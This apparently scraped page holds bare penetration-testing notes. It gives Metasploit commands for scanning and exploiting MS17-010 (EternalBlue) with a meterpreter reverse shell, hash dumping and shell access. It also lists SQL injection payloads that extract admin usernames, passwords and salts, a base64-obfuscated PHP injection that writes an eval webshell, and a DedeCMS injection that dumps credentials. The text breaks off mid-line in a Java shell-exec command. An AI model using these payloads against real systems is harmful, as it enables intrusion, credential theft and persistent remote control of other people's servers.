1、blue
msf> search ms17-010
use auxiliary/smb/smb_ms17_010
show options
set rhosts 192.168.100.1/24
set threads 50
exploit
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOST 192.168.100.192
exploit
set payload windows/x64/meterpreter/reverse_tcp
exploit
meterpreter>getuid
meterpreter>hashdump
meterpreter>shell
2、order_id=1 or updatexml(1, concat(0x7e, (user())),0) or 1#
order_id=1 or updatexml(1, concat(0x7e, (database())),0) or 1#
order_id=1 or extractvalue(1, concat(0x7e, (select distinct concat(0x23, user_name, 0x23) from ecs_admin_user limit 0,1))) or 1#
order_id=1 or extractvalue(1, concat(0x7e, (select distinct concat(0x23, password, 0x23) from ecs_admin_user limit 0,1))) or 1#
order_id=1 or extractvalue(1, concat(0x7e, substring((select distinct concat(0x23, password,0x23) from ecs_admin_user limit 0,1), 3,40))) or 1#
order_id=1 or extractvalue(1, concat(0x7e, (select distinct concat(0x23, ec_salt,0x23) from ecs_admin_user limit 0,1))) or 1#
${${fputs(fopen(base64_decode(dGVzdC5waHA),w), base64_decode(PD9waHAgZXZhbCgkX1BPU1RbdGVzdF0pPz4))}}
/plus/recommend.php?aid=1 & _FILES[type][name] & _FILES[type][size] &_FILES[type][type] & _FILES[type][tmp_name]=aa \ %27and+char(@'%27')+/*50000Union*/+/*!50000SeLect*/+1,2,3,group_concat(userid, 0x23,pwd),5,6,7,8,9%20from%20'%23@_admin'%23
Runtime.getRuntime().exec(new String[ ] {"/bin/sh", "-c", "
文章评论